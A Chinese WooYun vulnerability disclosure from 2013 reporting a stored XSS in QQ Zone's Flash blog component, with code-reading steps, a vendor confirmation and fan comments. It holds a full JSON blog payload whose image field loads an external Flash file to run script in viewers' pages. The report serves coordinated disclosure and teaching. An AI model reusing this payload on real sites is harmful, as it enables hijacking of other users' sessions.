当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020674

漏洞标题:QQ空间某功能缺陷导致日志存储型XSS - 10

相关厂商:腾讯

漏洞作者: gainover

提交时间:2013-03-26 08:51

修复时间:2013-05-10 08:52

公开时间:2013-05-10 08:52

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-26: 细节已通知厂商并且等待厂商处理中
2013-03-26: 厂商已经确认,细节仅向厂商公开
2013-04-05: 细节向核心白帽子及相关领域专家公开
2013-04-15: 细节向普通白帽子公开
2013-04-25: 细节向实习白帽子公开
2013-05-10: 细节向公众公开

简要描述:

话说微博上看过一故事,某人辛辛苦苦装修了房子,最后发现装修的是别人的房子。 修复漏洞有时候也是这样,出力出在了不该出的位置,辛辛苦苦修复的很好,最后其实修的不是正位置啊~

详细说明:

1. 接着系列8,我们继续阅读/qzone/newblog/v5/flash/GridsBlog.swf的代码。
接着上一次的BackGroundNavi下方不远处,我们可以可以看到 new Grids这段,userData(即我们的json数据)进入了Grids类,如下图:

1.jpg


2. 我们跟踪Grids类。搜索 Class Grids

2.jpg


数据进入了_dataObject后,跳入 initView
3. 在进入initView后,不远处,我们可以看到下面这样一段代码。

3.jpg


this._dataObject.cssSprite... 这个在我们提交的JSON数据里,并没有看到过 cssSprite 这个属性名。看来是某特定功能会用到的属性,读代码的好处这里就可以看出来了,如果是黑盒,是不可能测试到cssSprite这种属性的。
并且,这个cssSprite直接就进入了 load函数。
赤裸裸的漏洞么~~
4. 因此,我们可以修改魔方日志所提交的数据。加上一个cssSprite属性。

4.jpg


可以看到成功执行XSS。

5.jpg


5. 开发人员已经针对系列 8中 bgURL做了完整的修复措施。

6.jpg


我猜,如果我这个漏洞在此处结束,开发人员可能会采用上面的代码,将cssSprite也过滤一次。
就bgURL而言,这个修复是没问题的。但是这样有一点“治标不治本”的感觉,实际上在这个GridsBlog.swf中,load外部资源之前似乎都没有做过滤,所以个人觉得,应该做出修改的是FLASH文件,而不是在JS中一一过滤(吃力不讨好啊),否则就会继续出现本文中的问题。
6. 比如说吧: 其实下面这样也是可以的,将数据里的gXX.content.image 设置为外部FLASH一样可以导致XSS。

{"g1":{"visible":1,"id":1,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???С???????"},"g0":{"visible":1,"id":0,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????????"},"g8":{"visible":1,"id":8,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????2012??"},"g2":{"visible":1,"id":2,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????"},"g6":{"visible":1,"id":6,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????"},"templateName":"??????","g7":{"visible":1,"id":7,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????"},"g4":{"visible":1,"id":4,"content":{"mood":"","image":"","date":"2013-03-26&1","text":""},"type":0,"title":"???? 2013-3-26"},"g3":{"visible":1,"id":3,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????"},"version":"1.2","g5":{"visible":1,"id":5,"content":{"mood":"","image":"http://xsst.sinaapp.com/Xss.swf","date":"","text":""},"type":2,"title":"??????????"},"tempId":47,"bgItem":{"bgId":"87","bgURL":"/qzone/newblog/v5/flashassets/bg87.swf?bgver=1.0&max_age=31104000","gridcolor":"0xFF3300","alpha":1,"align":"right","wordcolor":"0xCC0000"}}


见弹窗

7.jpg


后面也不想再刷一次这个GridsBlog.swf,建议你们的开发人员将FLASH里会load外部资源的位置,都先check下,再load。

漏洞证明:

见详细说明

修复方案:

修复FLASH,不要在JS里修拉~

版权声明:转载请注明来源 gainover@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-03-26 11:36

厂商回复:

感谢,已在处理中!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-03-26 08:54 | 点点 ( 普通白帽子 | Rank:214 漏洞数:38 | 准备申请سمَـَّوُوُحخ ̷̴̐...)

    楼主神人啊,

  2. 2013-03-26 08:54 | lucky ( 普通白帽子 | Rank:409 漏洞数:81 | 三人行必有我师焉########################...)

    @gainover 二哥太给力了!

  3. 2013-03-26 08:55 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    这下巴适了~前排卖瓜子花生~

  4. 2013-03-26 09:00 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

    太牛逼了………………

  5. 2013-03-26 09:04 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    我都不敢mark了- -二哥每天一发我消息提示都被提示爆了

  6. 2013-03-26 09:07 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    二哥怒了

  7. 2013-03-26 09:08 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    二哥正在暴走 \n二哥已经超神的杀戮 \n二哥快要A爆QQ空间的泉水了 \n

  8. 2013-03-26 09:13 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:202 | 关注技术与网络安全(招人中,有兴趣请私信...)

    有趣。。。求带。。。

  9. 2013-03-26 09:18 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    求带。

  10. 2013-03-26 09:24 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:76 | coder)

    这是要把QQ空间团队刷爆吗?

  11. 2013-03-26 09:25 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    站位吧。。。二哥威武。。

  12. 2013-03-26 09:25 | rasca1 ( 实习白帽子 | Rank:53 漏洞数:16 | 菜鸟一只)

    靠,膜拜,各种拜,求收徒,求教育,求搞基。

  13. 2013-03-26 09:40 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)

    传说中的牛,你们见到了

  14. 2013-03-26 09:51 | blast ( 普通白帽子 | Rank:348 漏洞数:57 | 五仁委员会)

    给跪了

  15. 2013-03-26 10:03 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:64 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    二哥V5

  16. 2013-03-26 10:50 | Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)

    二哥 你想当一哥啊

  17. 2013-03-26 11:02 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    仅仅一个日志功能都连载到10了诶!

  18. 2013-04-26 08:51 | sysALong ( 路人 | Rank:19 漏洞数:5 | 电脑里的AV片 永远 和 电脑旁的卫生纸 成 ...)

    v5.....

  19. 2013-04-27 17:58 | 天鱼 ( 实习白帽子 | Rank:47 漏洞数:5 | 逝去的梦)

    V5,膜拜大神

  20. 2013-05-10 10:26 | Getshell ( 路人 | Rank:12 漏洞数:2 )

    膜拜…

  21. 2013-11-04 11:40 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:60 | 慢慢挖洞)

    @gainover,大神,求带啊,你这随便一测就是控件的n个漏洞,太牛了可以带我吗